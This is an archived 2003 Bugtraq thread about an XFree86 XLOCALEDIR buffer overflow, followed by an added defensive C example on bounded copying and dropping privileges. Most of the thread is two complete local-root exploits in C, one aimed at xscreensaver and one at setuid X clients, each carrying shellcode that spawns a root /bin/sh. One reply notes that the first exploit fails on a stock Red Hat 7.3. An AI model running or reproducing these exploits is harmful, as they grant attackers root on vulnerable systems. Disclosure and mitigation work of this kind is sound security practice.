92958 2003-03-06  21:41  /52 lines/ Angelo Rosiello <guilecool@usa.com>
Imported: 2003-03-06  21:41  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3863>
Subject: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------


I think you don't need other comments:

/*
**
** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
**
** deka is leet brother, thank you :>
** MAIL: guilecool@usa.com
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0xbfffdf20 //change it if u need

char shellcode[] =
 "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
 "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
 "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
 "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
 "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
 "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80";

int main()
{
        char buf[4076];
        unsigned long retaddr = RETADDR;

        memset(buf, 0x0, 4076);
        memset(buf, 0x41, 4072);
        memcpy(buf+2076, &retaddr, 0x4);
        setenv("XLOCALEDIR", buf, 1);
        memset(buf, 0x90, 4072);
        memcpy((buf+4072-strlen(shellcode)), shellcode, strlen(shellcode));
        setenv("HAXHAX", buf, 1);
        execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);
}
(92958) /Angelo Rosiello <guilecool@usa.com>/-------
93130 2003-03-07  18:36  /27 lines/ Steven Leikeim <steven@enel.ucalgary.ca>
Imported: 2003-03-07  18:36  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3874>
Comment on text 92958 by Angelo Rosiello <guilecool@usa.com>
Subject: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
On Thu, Mar 06, 2003 at 06:26:41PM -0000, Angelo Rosiello wrote:
> 
> I think you don't need other comments:
> 
> /*
> **
> ** Tested on rh 7.3 using XFree86
> ** xscreensaver vulnerability
> ** AUTHORS: Angelo Rosiello (Guilecool) & deka
> ** REQUIRES: X must be run!
> ** EFFECTS: local root exploit!
> **

Oddly enough, this does NOT work on my RedHat 7.3 installation. I
have the default xscreensaver RPM installed (xscreensaver-3.33-4).

When I run this, xscreensaver DOES dump core, however, xscreensaver
is not suid root and so will not itself give a root exploit. Perhaps
there is an expected interaction with the X server (which is running
as root) but this is not clear from Angelo's message.



Steven Leikeim
Department of Electrical and Computer Engineering
University of Calgary
(93130) /Steven Leikeim <steven@enel.ucalgary.ca>/(Reflowed)
93143 2003-03-07  22:42  /16 lines/ Inode <inode@mediaservice.net>
Imported: 2003-03-07  22:42  by Brevbäraren
External recipient: Angelo Rosiello <guilecool@usa.com>
Recipient: Bugtraq (import) <3884>
Subject: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+
| Agazzini Maurizio                       Tel:   +39-011-32.72.100  |
| Security Analyst                        Fax:   +39-011-32.46.497  |
| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
|                                                                   |
| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |
+-------------------------------------------------------------------+
(93143) /Inode <inode@mediaservice.net>/------------
Attachment (text/plain) in text 93144
93144 2003-03-07  22:42  /73 lines/ Inode <inode@mediaservice.net>
Attachment filename: "xfree_4.2_exploit.c"
Imported: 2003-03-07  22:42  by Brevbäraren
External recipient: Angelo Rosiello <guilecool@usa.com>
Recipient: Bugtraq (import) <3885>
Attachment (text/plain) to text 93143
Subject: Attachment (xfree_4.2_exploit.c) to: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
/*

	Original exploit:
		** oC-localX.c - XFree86 Version 4.2.x local root exploit
		** By dcryptr && tarranta / oC

	This exploit is a modified version of the original oC-localX.c
	built to work without any offset.

	Some distros have the file: /usr/X11R6/bin/dga +s
	This program isn't exploitable because it drops privileges
	before running the Xlib function vulnerable to this overflow.

	This exploit works on linux x86 on all distros.

	Tested on:	
		- Slackware 8.1 ( xlock, xscreensaver, xterm)
		- Redhat 7.3 ( manual +s to xlock )
		- Suse 8.1 ( manual +s to xlock )

	by Inode <inode@mediaservice.net>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char shellcode[] = 

        /* setresuid(0,0,0); */
 	"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
        /* /bin/sh execve(); */
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
        /* exit(0); */
        "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";


#define ALIGN 0 

int main(int argc, char **argv)
{
	char 	buffer[6000];
	int i;
	int ret;
	char *env[3] = {buffer,shellcode,  NULL}; 

	int *ap;

	strcpy(buffer, "XLOCALEDIR=");

	printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n");
	if( argc != 3 )
	{
		printf(" Usage: %s <full path> <name>\n",argv[0]);
		printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
		return 1;
	}

	ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;

	ap = (int *)( buffer + ALIGN + strlen(buffer) );

	for (i = 0; i < sizeof(buffer); i += 4)
		*ap++ = ret;
	
	execle(argv[1], argv[2], NULL, env);

	return(0);
}
(93144) /Inode <inode@mediaservice.net>/------------
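The thread turns on two defensive points: the overflow only matters when the X client that reads XLOCALEDIR runs setuid (Steven Leikeim's observation that xscreensaver on Red Hat 7.3 is not suid root), and a program that drops privileges before it touches the environment is not exploitable even when the bug is present (Inode's note on dga). The following C program is an added illustration of those mitigations written for this archive page; it is not Xlib, XFree86 or xscreensaver code. The buffer size LOCALE_PATH_MAX and every function name are assumptions chosen for the example.

```c
/* Added example: defensive handling of a path taken from an environment
   variable such as XLOCALEDIR inside a program that may run setuid.
   Constructed for this thread; it is not Xlib's or xscreensaver's code. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define LOCALE_PATH_MAX 256   /* assumed buffer size for this illustration */

/* 1 when the process is not setuid/setgid (real ids equal effective ids),
   0 when it is. A setuid program must treat every environment variable as
   attacker input; glibc's secure_getenv() applies the same kind of test. */
int env_is_trusted(void)
{
    return getuid() == geteuid() && getgid() == getegid();
}

/* Bounded replacement for strcpy(buf, getenv(...)). Copies value into out
   (capacity outlen) only if it fits with its terminator and is an absolute
   path. Returns 0 on success, -1 on NULL, over-long or relative input; out
   is always NUL-terminated and left empty on rejection. */
int copy_env_path(const char *value, char *out, size_t outlen)
{
    if (outlen == 0) return -1;
    out[0] = '\0';
    if (value == NULL || value[0] != '/') return -1;
    size_t n = strlen(value);
    if (n >= outlen) return -1;   /* would overflow: reject, never truncate silently */
    memcpy(out, value, n + 1);
    return 0;
}

/* Reads `name` from the environment with both checks applied: the variable
   is ignored entirely (returns -2) while the process is setuid/setgid. */
int locale_dir_from_env(const char *name, char *out, size_t outlen)
{
    if (outlen) out[0] = '\0';
    if (!env_is_trusted()) return -2;
    return copy_env_path(getenv(name), out, outlen);
}

/* Permanently give up elevated privileges before touching untrusted input,
   the order Inode describes for dga. Returns 0 when the drop is verified. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0) return -1;            /* group first, while still privileged */
    if (setuid(ruid) != 0) return -1;
    if (ruid != 0 && setuid(0) == 0) return -1;  /* the drop must be irreversible */
    return 0;
}

/* 1 if path carries the setuid bit, 0 if not, -1 if it cannot be stat'ed:
   the check Steven Leikeim applied to xscreensaver. */
int has_setuid_bit(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Exercises copy_env_path on constructed inputs; returns the number of
   failed checks (0 when the bounded copy behaves as documented). */
int self_check(void)
{
    char out[LOCALE_PATH_MAX];
    char big[LOCALE_PATH_MAX + 64];   /* constructed over-long value */
    int failures = 0;
    memset(big, 'A', sizeof big);
    big[0] = '/';
    big[sizeof big - 1] = '\0';
    failures += copy_env_path("/usr/X11R6/lib/X11/locale", out, sizeof out) != 0;
    failures += strcmp(out, "/usr/X11R6/lib/X11/locale") != 0;
    failures += copy_env_path(big, out, sizeof out) != -1;    /* too long: rejected */
    failures += out[0] != '\0';                                /* and nothing copied */
    failures += copy_env_path("relative/dir", out, sizeof out) != -1;
    failures += copy_env_path(NULL, out, sizeof out) != -1;
    return failures;
}

int main(int argc, char **argv)
{
    char dir[LOCALE_PATH_MAX];
    const char *target = argc > 1 ? argv[1] : "/usr/X11R6/bin/xlock";
    printf("%s setuid bit: %d\n", target, has_setuid_bit(target));
    if (drop_privileges() != 0) return 1;
    int rc = locale_dir_from_env("XLOCALEDIR", dir, sizeof dir);
    printf("XLOCALEDIR: %s (rc=%d)\n", rc == 0 ? dir : "rejected or unset", rc);
    return self_check() == 0 ? 0 : 2;
}
```

Run it with the path of any X client as its argument to see whether that binary is setuid at all; the ordering in main (drop privileges, then read the environment, then use it) is the one that makes an overflow in the path handling worth at most the invoking user's own privileges.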